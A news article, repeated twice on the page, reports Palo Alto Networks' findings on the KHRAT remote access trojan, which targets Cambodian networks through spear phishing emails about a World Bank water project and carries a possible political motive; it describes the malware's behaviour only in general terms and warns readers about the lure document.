Cambodia under cyberattack, political background suspected
Cambodia’s private and public computer networks have become targets of malicious code unique to the country which is activated through spam emails and phishing attempts, according to US-based cyber security firm Palo Alto Networks.
The malware comes as KHRAT, short for Khmer Remote Access Trojan, which lures victims with emails disguised as official communications. It has been first noticed in late June, but is now seemingly having enhanced capabilities and weaponry, security experts at Palo Alto Networks said, adding that the trojan’s aim is to enter a victims computer system to spy out information through the use of keylogging, screenshots and remote shell access.
“KHRAT is a trojan that registers victims using their infected machine’s username, system language and local IP address,” the cyber security firm wrote in a blog.
“It uses updated spear phishing techniques and themes, multiple techniques to download and execute additional payloads using built-in Windows applications, expanded infrastructure mimicking the name of the well-known cloud-based file hosting service Dropbox and compromised Cambodian government servers,” it added.
In the latest version, the attacks are performed through fraudulent emails containing infected attachments relating to the Mekong Integrated Water Resources Management Project (MIWRMP), a $15-million-initiative funded by the World Bank which is currently being deployed to improve water and fisheries management in North Eastern Cambodia.
Computer users should be extra vigilant when receiving an email with an attached Word document named “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June 26-30, 2017(update).doc” pretending to be related to the water resources project.
But when users try to open the Word file, it claims that the computer’s version of Microsoft Word needs to be updated to make the content readable and lures them into a few clicks that enable Word’s macro function and load down malicious code from a Russian server which then executes the trojan and deploys additional malicious code that modifies the Windows registry.
The fact that the malware was also hosted on the Cambodian government’s website, together with the political nature of the spear phishing emails, could lead to the assumption that the attacks may have the purpose of spying on political rivals or disrupting political activity, Palo Alto Networks noted.
Cambodia's private and public computer networks have become targets of malicious code unique to the country which is activated through spam emails and phishing attempts, according to US-based cyber security firm Palo Alto Networks. The malware comes as KHRAT, short for Khmer Remote Access Trojan, which lures victims with emails disguised as official communications. It has been first noticed in late June, but is now seemingly having enhanced capabilities and weaponry, security experts at Palo Alto Networks said, adding that the trojan's aim is to enter a victims computer system to spy out information through the use of keylogging, screenshots...
Cambodia’s private and public computer networks have become targets of malicious code unique to the country which is activated through spam emails and phishing attempts, according to US-based cyber security firm Palo Alto Networks.
The malware comes as KHRAT, short for Khmer Remote Access Trojan, which lures victims with emails disguised as official communications. It has been first noticed in late June, but is now seemingly having enhanced capabilities and weaponry, security experts at Palo Alto Networks said, adding that the trojan’s aim is to enter a victims computer system to spy out information through the use of keylogging, screenshots and remote shell access.
“KHRAT is a trojan that registers victims using their infected machine’s username, system language and local IP address,” the cyber security firm wrote in a blog.
“It uses updated spear phishing techniques and themes, multiple techniques to download and execute additional payloads using built-in Windows applications, expanded infrastructure mimicking the name of the well-known cloud-based file hosting service Dropbox and compromised Cambodian government servers,” it added.
In the latest version, the attacks are performed through fraudulent emails containing infected attachments relating to the Mekong Integrated Water Resources Management Project (MIWRMP), a $15-million-initiative funded by the World Bank which is currently being deployed to improve water and fisheries management in North Eastern Cambodia.
Computer users should be extra vigilant when receiving an email with an attached Word document named “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June 26-30, 2017(update).doc” pretending to be related to the water resources project.
But when users try to open the Word file, it claims that the computer’s version of Microsoft Word needs to be updated to make the content readable and lures them into a few clicks that enable Word’s macro function and load down malicious code from a Russian server which then executes the trojan and deploys additional malicious code that modifies the Windows registry.
The fact that the malware was also hosted on the Cambodian government’s website, together with the political nature of the spear phishing emails, could lead to the assumption that the attacks may have the purpose of spying on political rivals or disrupting political activity, Palo Alto Networks noted.
